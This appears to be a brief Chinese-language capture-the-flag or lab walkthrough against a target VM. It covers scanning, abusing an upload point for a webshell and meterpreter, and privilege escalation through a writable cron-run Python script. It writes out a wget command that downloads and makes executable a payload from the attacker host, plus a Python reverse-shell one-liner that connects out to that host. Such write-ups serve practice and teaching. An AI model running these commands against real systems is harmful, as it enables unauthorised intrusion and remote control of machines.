靶机, 启动
192.168.10.16
端口扫描
web 服务
目录扫描
在主页的下面发现了一个上传点, 直接上传反弹 shell
使用 nc 失败, 换成了 webshell
然后还是用了 meterpreter
wget http://192.168.10.11:8000/shell.elf -O /tmp/shell.elf&&chmod 777 /tmp/shell.elf
www-data ,进一步收集信息
/home/alabaster/nice_list. txt
这有个 python 代码,. 在 linpeas. sh 枚举之后发现是定时任务, 并且是可写的
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > nice_or_naughty.py
echo 'import subprocess; subprocess.call(["/tmp/newshell.elf"])' > nice_or_naughty.py
又是这样子不稳定的 shell
上传一个 socat 二进制文件上去算了